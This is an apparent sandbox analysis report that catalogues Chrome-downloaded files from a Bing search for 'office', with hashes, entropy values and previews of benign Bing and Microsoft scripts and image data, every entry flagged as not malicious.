                                                                                                    Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1067 x 742, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):571791
                                                                                                    Entropy (8bit):7.997310243142735
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:12288:GQEnGqYKJ83t1x9Y9c9YA6P/WVzSF3rbuQdzQHULLq:NEnxlJ89LL9YAcoG5H8mq
                                                                                                    MD5:27F24F9CACA928D2DD0AA2192FF055EA
                                                                                                    SHA1:EFE1BE378E1F124A5F4529FFD45F18CB2E3434D4
                                                                                                    SHA-256:47DC43974FD21405DAE835D7A87429F90F3028EE9726A96ECA0F80CD765E22F4
                                                                                                    SHA-512:2121BC94FBD792D9D388480CC75B3A6375E2DDAF3A6C6EE6DC7A4934DF1187EAEBCC71481E526D7EF5912A7F10B711B13D72AD5468F825EB331FEC1DB038B55A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...+.........km......pHYs.........&.:4....sRGB.........gAMA......a....$IDATx.....n.U.....w.7.<f"....BP0..P.dj!.....A..n.m4.W.o..n..E.li..DD.a.!..B..2..y.J........o.u.{.W..j..[...;g.k....6Q".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$..D".H$.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (65394)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):91802
                                                                                                    Entropy (8bit):5.3603423050848615
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                    MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                    SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                    SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                    SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js
                                                                                                    Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2609 x 471, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):698616
                                                                                                    Entropy (8bit):7.988990542773947
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:7B7J02MzM8uOZuft67QhY3HZuppyR3l6Pjk48XOIWoXZQikJSPU7NLRlg:s2MzOOZulaQhY39xMrhQWoXaiwSc7/y
                                                                                                    MD5:A907814C618999761488552FF59ABE52
                                                                                                    SHA1:9328DD8911EFD581DAF9F18649B687C683D93787
                                                                                                    SHA-256:A85710F22BD11B8F228D8B7387F87E5A066FF7CAB256D9719D01881A00FD7CE8
                                                                                                    SHA-512:8982B24CFC82EBD3A6E9DC0C6996B2E04963F60A248DF3EA1C89EFBA52D49E2A6660B0321F4A217BA8778B1D301C43C91598D450D22451EC0F393A38EB8786A4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR...1..........Y.....pHYs.................sRGB.........gAMA......a.....IDATx...=.vG.&.E..|O...E.@. .P.CC#./.<.C{%S...B.d6...|..]o..b8.Z..5h-.......E.{>{.N......WF....V..p...<....'3.#..h.....?5..<.8..\[\9....oB.. ...8c>.........".~.....{......,w.y-...Q..A..9..#<....M2K..*}.,/.x.CiW2U..G...@.t.s."...k%}.4f.F:...C.-Q.#u.?R..."..y../...;~.Wxq}K. .n.Vr.p*.W..W=.G..G.n...i...|..E..,.?........]9.b..}...-../8.">...U\..6..-..i...xo.........e..u.=.............~.|.n...JZ.M.A_.._.e..7...L........S...O./.|S..|."o...........]\.q].jI.}.5.#M).............o....T..2.,......o.j...;...=.KY..t..e............w...W.... .............A..?.m\.=.../...y.....K..6.{._.._p...?.........?.s..?..\................w..O~...~..?..?k?...z...~k.|..Q.-.@)..o.i.~.a.f.w..>.....O<...+../...o.._....._.j.oso.t^.R..R..bj..M7.t.M7.t.M7.t.M7...D.6.}..g....'...N...../.l......2Wi_..u../~..W...........?w.o+y.tZ.wX.sU..?tL...g....T..j.mG?..C.........k..}..K...5.5.3=.s-.r.._....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1531
                                                                                                    Entropy (8bit):7.562261737548145
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ZtRNh48tJqlVgBYWV3NS+LzIoXhz6lsRtXY+L92k28MKjjhRWpmyCcWnjKL:Z9h48tJ7jM4Iq6lsbX2TcNHuL
                                                                                                    MD5:A441AACFCFD991FC38731D9A87DCF89B
                                                                                                    SHA1:727E7CD1B9DCA6D86B17EDA7B98E295989A8B222
                                                                                                    SHA-256:E904607C1C638C9491A91A41778B9C44AAB696AF6D1CC2EC2D0707E3A8A95940
                                                                                                    SHA-512:812077785D1FA3B8C78B971EDD2324CB97A3A60B05576D402CA4567D9BA42F7ED0841D843B9FFA6DFCA88CACF38825A306E0B2533C21FA1902948C282218D472
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............P.P.."................................................j.d.w.3..)C.-.....,.$..S.x.?...u\..{l.1.......*......a.&....nj.&3/..)..._}..t^X.Av..........................................'i.9&....A.#.^.[2........i..Th..........5.........................!1."aq..#2AQS.R...$BCr............?..[.Z.|s.]./Vo!...jmZ...&.G)8Oy....W4.~...I.....y|.S.V.|pH..T.e...eEgv..7,N....%]...V..1.ye..;;...G2H..Y.?s..E.\.....vG^..b2....pyJ...#....2.. ..k.X.....-..8.p.S.d.~......p.i......e!.o...8..I...q[...B.u....}..~I...T.Y@.....;......]}..-.V'.6[.m.;..E.z}.X..p.6#...Ot.b*.*...@.r.zv.....5.k...d..x{...r..Y.I......p.l..%O.V.,.d;...~..<.Z..r8b...Q.....)..k......3H..QS........|..f...hR...........9#...uta...A.#.UR..UF..v.x.......I.pd..G...Y.u....3Q../Y.....O0p.4..x.wX. ...W'wY...K...n.{g..v1.F8.En...bq.......^.b..>.....5..-b%ea...#...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):5944
                                                                                                    Entropy (8bit):7.819206752415454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                    MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                    SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                    SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                    SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/lvCKZ07bEYtoYmY62ifMzVa0RIE.jpg
                                                                                                    Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:59:08....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.........................................................................................h......................E..T..r..D........@..H.F&....`5.e.%...."..U@C.r.e...5.-.`4".[.`.1C.$)..pZ.".;. .(..w...x.f..*sU[....Y..<.:...b..=+.........n\.b)sv/4^`-.kN.;.v..X....Z......#_...N.....j..4.\......T..,.....B..&..L....^LcJ.KA.=....!iEY...!N....Z.:.d.i..F..d...sP.w=<..59]O..u.?..3...]i....F...C.X...[M..z..<...k..rL.UYr.jz.@ sTf..D8,5.+..<jWr..oL...<H.k;.A I.k)...'.y.j.uZ.,4......(.\HH.ByC..*1.jt.X...Z.......w......`.v.TZ.M.f.J.}.F.e..Te.-N@S...+.].\..u-9..Xg* .B.[M.$..'.ry....Zf...CV.D...S...65 `mH@#.j[.y."...r ).5.B\.o...B...Ee..Q@....,..)..u#..i.j.jAsT...[J.c_...'.....................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (62165), with CRLF, LF line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):426704
                                                                                                    Entropy (8bit):5.729642153586535
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:b0114MNIX8POpz796OdWBxcbZvBQjmB5/sq8lBGkFZjeCLv1MwpmbVGvcVGi:b011njOpX9oxcbZvBQjmB5W6l0i
                                                                                                    MD5:985E30E790B2A617C4D9BD7BE0981833
                                                                                                    SHA1:CBAAFE18F8881B079363BF0481486441CFFB02A5
                                                                                                    SHA-256:BD89C25D4D86208826169CF0897156A23A99BA38DE8FCBAFF61A94B18D911AF0
                                                                                                    SHA-512:B64042CCA9AAA81A06D0CED9E512BE29CE1173EF02415EF7AFEDC0EC77E4CB14CE2314F7BE8B6F44E6172D7A7C0F43ADB6434F3BA10E5E2182F07E77DC500FEE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/search?q=office
                                                                                                    Preview:<!DOCTYPE html><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="http://schemas.live.com/Web/"><script type="text/javascript" nonce="7VG72MSrJbn6GfJ+OPti5Jec461qd1jd3TMp7Z4i3Aw=" >//<![CDATA[..si_ST=new Date..// </script><head> pc--><title>office - Search</title><meta content="text/html; charset=utf-8" http-equiv="content-type" /><meta name="referrer" content="origin-when-cross-origin" /><meta name="SystemEntropyOriginTrialToken" content="A1L3tx5CzccqjN3lK6st/fXMwhf9EeokCPf8XCt0DVI8JPbg37BWq0zKvlqgkdm8YEUbthoGkC/xdR1+iIz4txAAAABxeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiTXNVc2VyQWdlbnRMYXVuY2hOYXZUeXBlIiwiZXhwaXJ5IjoxNzM5NzI0MzExLCJpc1N1YmRvbWFpbiI6dHJ1ZX0=" http-equiv="origin-trial" /><meta property="og:description" content="Intelligent search from Bing makes it easier to quickly find what you.re looking for and rewards you." /><meta property="og:site_name" content="Bing" /><meta property="og:title" content="office - B
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41572
                                                                                                    Entropy (8bit):7.881530849843299
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FlDXLaMHUbra8omv3ZYL2ZlcB1xSXcqObja/dUUbe8k:rXHH+Goa2Zlc1Obk
                                                                                                    MD5:3051C1E179D84292D3F84A1A0A112C80
                                                                                                    SHA1:C11A63236373ABFE574F2935A0E7024688B71CCB
                                                                                                    SHA-256:992CBDC768319CBD64C1EC740134DECCBB990D29D7DCCD5ECD5C49672FA98EA3
                                                                                                    SHA-512:DF64E0F8C59B50BCFFB523B6EAB8FABF5F0C5C3D1ABBFC6AA4831B4F6CE008320C66121DCEDD124533867A9D5DE83C424C5E9390BF0A95C8E641AF6DE74DABFF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR.............R.l.....gAMA......a.....pHYs..,J..,J.wztM....IDATx^....\...k....;......L"..9..F.s.9!'FQ.H1S$. ...L.D.9.@$.........sw..]..iT.Hyd.)J..<.S..S....{.Z.T.7......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18......cp...18...7.......i..i~......Mx>....zo.y...KJ..m......1...?,k|........8+..g.Mx.......6=.t...Q.....7)..........~g.S>.j.St.....6|w.'uO.:]....:..>/Wk...5/HK.r..%.]...i|.q..{.-M/.r....7._y...../6}o........*.;!....a...Y....z.H..+..=...g...<+........u.R...~A..(../K[.....U..WZZ..w...W~ym.+SoL..C...........CD.fI...67>^....>T...G.g.>Q2KN.}[..|[.....Z.......ZZ.+...Hg.s.]..... .%/Jo.K.(.Yz+.'..JO.]=M._l...;._.~....Y..z....7....[....[..O...G+g.2sX...3....9.a.s.......>-.y.a...]..0..E/...Eq.<..,......{..y..1..5w&|..cT.I...z....W...aS..v.=.h_..-.J......O...O...3i...G.R..r-.[..m..:KZ......;.i..xF...d='...H.."./....D.P.."%..)C.Io..;...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (511), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):511
                                                                                                    Entropy (8bit):4.980041296618112
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:yWF4eguIWKvU9bEMsR5OErixCvJO1Vi5rgsM:LF4mKctEMYOK4CvJUVYM
                                                                                                    MD5:D6741608BA48E400A406ACA7F3464765
                                                                                                    SHA1:8961CA85AD82BB701436FFC64642833CFBAFF303
                                                                                                    SHA-256:B1DB1D8C0E5316D2C8A14E778B7220AC75ADAE5333A6D58BA7FD07F4E6EAA83C
                                                                                                    SHA-512:E85360DBBB0881792B86DCAF56789434152ED69E00A99202B880F19D551B8C78EEFF38A5836024F5D61DBC36818A39A921957F13FBF592BAAFD06ACB1AED244B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/iWHKha2Cu3AUNv_GRkKDPPuv8wM.js
                                                                                                    Preview:var BingAtWork;(function(n){var t;(function(n){function t(t,i){var u,r;t.isAuthenticated&&(n.raiseAuthEventAndLog(t),u=_ge("sb_form_q"),u&&(r=u.getAttribute("value"),r&&(n.fetchLowerHeader(r),n.fetchScopeBar(r),i.notifEnabled&&i.notifFetchAsync&&n.fetchNotificationConditional())))}function i(n,i){n&&n.length==2&&t(n[1],i)}n.bindToConditionalSignIn=function(n){sj_evt.bind("ssofirstquery",function(t){return i(t,n)},!0,null,!1)}})(t=n.ConditionalSignIn||(n.ConditionalSignIn={}))})(BingAtWork||(BingAtWork={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1663
                                                                                                    Entropy (8bit):5.118614360470706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                                                    MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                                                    SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                                                    SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                                                    SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/Wjh0-59ZfkL92U5bxdoKcJtw1Xo.js
                                                                                                    Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (841), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):841
                                                                                                    Entropy (8bit):5.164356246203931
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:9bGk4aZBJKbeS0YeHTwnJw7+GbSVTJjnWU+YWogltaOHUPbpbvN:hpCbe9YwZbSZRB+YgruDdV
                                                                                                    MD5:48833DEA59BC0B37177AB4C6C233DFBB
                                                                                                    SHA1:966780D21AD4544DB989E986B2FC3AB70983260C
                                                                                                    SHA-256:DE9CCA3CD151B7DD74DA15992299C993D91A424083C1EFB2A948230E87FECB4B
                                                                                                    SHA-512:B7E00BD79148657CA517B959C48B4E7E1F70CC7D5EC9B30DF5FBD0A7F6E9275F16797C7414CAC30FA6972F958D4A64E3AC45DC7D9BE8FD517F66D44AA78207EE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/lmeA0hrUVE25iemGsvw6twmDJgw.js
                                                                                                    Preview:var AlgoInnovationAnchorUrlRedirect;(function(){function t(){function t(){var r=_d.querySelectorAll(n),t,u;if(r)for(t=0;t<r.length;t++)u=r[t],u&&sj_be(u,"click",i)}function i(n){var t,i;if(n&&(t=n.target,i="",t&&t.parentNode&&t.parentNode!=null&&t.parentNode.tagName==="A"&&t.parentNode.classList.contains("batgil"))){var e=t.parentNode,o=e.getAttribute("href"),s=o.split("#:~:text=")[0];i=u(o)?f(s,t.innerText):s+="#:~:text="+t.innerText;r(i)&&e.setAttribute("href",i)}}function r(n){return n&&/^https?:\/\/.+/.test(n)}function u(n){return n.indexOf("bing.com")>0&&n.indexOf("/ck/a")>=0?!0:!1}function f(n,t){var i,r;if(!n)return"";try{return i=n.match(/u=a1([^&]*)/),r="",i&&i.length>1&&(r=i[1]),window.atob(r)+"#:~:text="+t}catch(u){return""}}t()}var n=".tltg ";t()})(AlgoInnovationAnchorUrlRedirect||(AlgoInnovationAnchorUrlRedirect={}))
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 60 x 60, 8-bit colormap, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1929
                                                                                                    Entropy (8bit):7.811068957377272
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:SbgS+jqY4I/a8na4MDgpl2RU/gZ2xY5X/:SbgS+x4IJ2Eu/2xC/
                                                                                                    MD5:4C155FCB5DD3DA464451AD240B6DE606
                                                                                                    SHA1:7A6F3C8D8AF764EBFBC97DC0AA8394E73F041270
                                                                                                    SHA-256:D43878B92743C77FDB440C222D97F70CA661122C98B45436D0DA5B2DB98468ED
                                                                                                    SHA-512:061EDA91A7C4679EF824E3E79B8B52090D1DE129D76008B1A697FE7A0F1900B89473EF635A7D2D909C6E684C0BD63B338B89F897F4CC00D5B5C64341A7433136
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://www.bing.com/rp/em88jYr3ZOv7yX3AqoOU5z8EEnA.png
                                                                                                    Preview:.PNG........IHDR...<...<......")@....PLTEGpL..^.lT.Z.....8.L...._.i..[...^....yu.do.T....|...X.@<.U..W..BL.S. g.(....,.X..l}..%Y.l.L.H...]..Y\.O.Z.m.>.V..t....t.ZH......T...,.....W.@..J...........}.V..qA.b>.6...V..R.F?.w..p.~...J.P....6...U<.W...k'..s.\/..q.]..B..I#..8...yE.;.....V.7..5...l....sw...#.p.....7..>=..m.@..C..T.P..X..n}<...S.....Z..P..]..{..[=..W..Y..R.k.p.]..o.<..N.Z.l ...F.....h@.h..o..u..8=.tC.....k..J..S.H..zT.G?.UH.c.U....%...F=.e...c.....q.wv.Q...H.~r..`.U..J...N.`.*...N..j...i Y..{u....N...f.O...U*...zE.a..U..X..]..k@.....Z.pB.R=.V...S.b..q{..L.......L=.rG..L.......W..a.....T..Y.A......R.........Gb.g..'....R...L....f..Y.&..3.."...ty.b=......U../L.{R.s......j.a..>..#w.Y..P5....H..l......F...o.D7..8....*..h.V..W.`.m.|.U.T....-.."......4.....9.`.M.......2..+...^_..Xq......[tRNS.. .0. ..u.@P..g.h...xwo..(*..h..._.P``....P `..p...P._......@........@@..0.P@@.)=.7....IDATx^..SteI...37Ng.i.3..4.....m...m..j.S....~..s~..u.q.:....)zW...*..y
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):757
                                                                                                    Entropy (8bit):7.536965518428831
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/78sd3/+LDJR7O7arbiDoLmvt9HNjz+5t3riPKL0oFnyi1867I:852LChDB1y5tb30oFf37I
                                                                                                    MD5:56F08A996739A6937828640B4FB5B9CB
                                                                                                    SHA1:64D02C228BC617491629F0EC19D838633BEF1241
                                                                                                    SHA-256:C708B796E5530DDF8F1BA4DD1553A7209E14D28B6560608E48AD653674A7C57C
                                                                                                    SHA-512:681C77A2C48413F67659CDD24D175604918BA229B7C3370EECA80762043B66F86D24AABB40452EF6DCD47D4D33941865F00A4245EFEB534139B395C42279491D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?u=https%3a%2f%2fimg-s-msn-com.akamaized.net%2ftenant%2famp%2fentityid%2fAA3lldo.img&ehk=ZOOC%2fXpgFV3e39TKF3DwmdPnPbz1%2f1UjDdeXge%2bUAeo%3d&w=16&h=16&o=6&pid=Wdp
                                                                                                    Preview:.PNG........IHDR................a....gAMA......a.....pHYs..........#.u....tEXtSoftware.Adobe Fireworks CS6.....oIDAT8O...KTQ..".C}0...f..D/a.>...W.`..*....N.5..h..Xia...$M.....z4.'.R..s.>.9s....s......................"^...0..eP...x..U....l.B.K.D.p......./dW..,~.....)....`....{.A....,.c.. bA.Nn..H.....X.F`.Q.|...1q....zw%.~... .Nc.>..j...w@t..h...\..a.O... .. .N!}..k..l.h....S. [Jh^%........aN...m.q..,x.rh.l...A......-..Z.........e.=L.^.t..D...bWO.5rR7.\.....R.....0.a..(.)...<.F9.Sj..8]..+.xQ^q~.2^.s...d.........V`;..{.5.C.../I/.d.............'.^..E.n.v.......i...V2......p!.....n.......gi.l...,..RX..d^.........e.5.rXO...#;..c...j...9q>....o..$.....e0.`.@g......::N...k64H%..7....w....|.`<d.i.3.B6..?..?.S.%.....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4177
                                                                                                    Entropy (8bit):7.891831987954031
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:TMEun138Oobhu1m+VfJc2d3uTjypzwY/vmZIwhmRMngD8HBuOrALxD:QV7ew1P5PMcnvm+ZMngYHBuOSD
                                                                                                    MD5:196C07381A93FA0FC2032B513AA437BB
                                                                                                    SHA1:81FEFE30FC703B6CFA04F075B154FE38D71D316E
                                                                                                    SHA-256:3629459B70D617E16888A6F4A33398AFA669A0373C3DD1C04A73346E85F36BB5
                                                                                                    SHA-512:2CF6F747C37C6E9AF4640FCD118EC39C751998CDF95A83756476EECE8FC35B0733E3D0D61660C4790F22C63706CC451FC1921FC650BF0778BDEBE3C58486BD12
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..<'...6p.j?..u. ..J.....;r.......q. ..:W..'..>.I4....&.#...+....,.....l0nrs.......?.-......CH5+....lr.O^.q.V...+|...V{?......]....T......;NO.b..Q.b...B......?mo....M..).4.....k.s.^^.Ze...>Z......W9.~.?.5Gc./.k......x..>....vA.s....2y.5.7.....s5..x5m..6.....*..,............^.....V.<L....=F.5W...WL'R..Z...._.b.i.~..~.u.h~.?..-.[.w.4>..A..+.oqc=..B"...ePyh.......>..#.5
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2169
                                                                                                    Entropy (8bit):5.302641155413102
                                                                                                    Encrypted:false
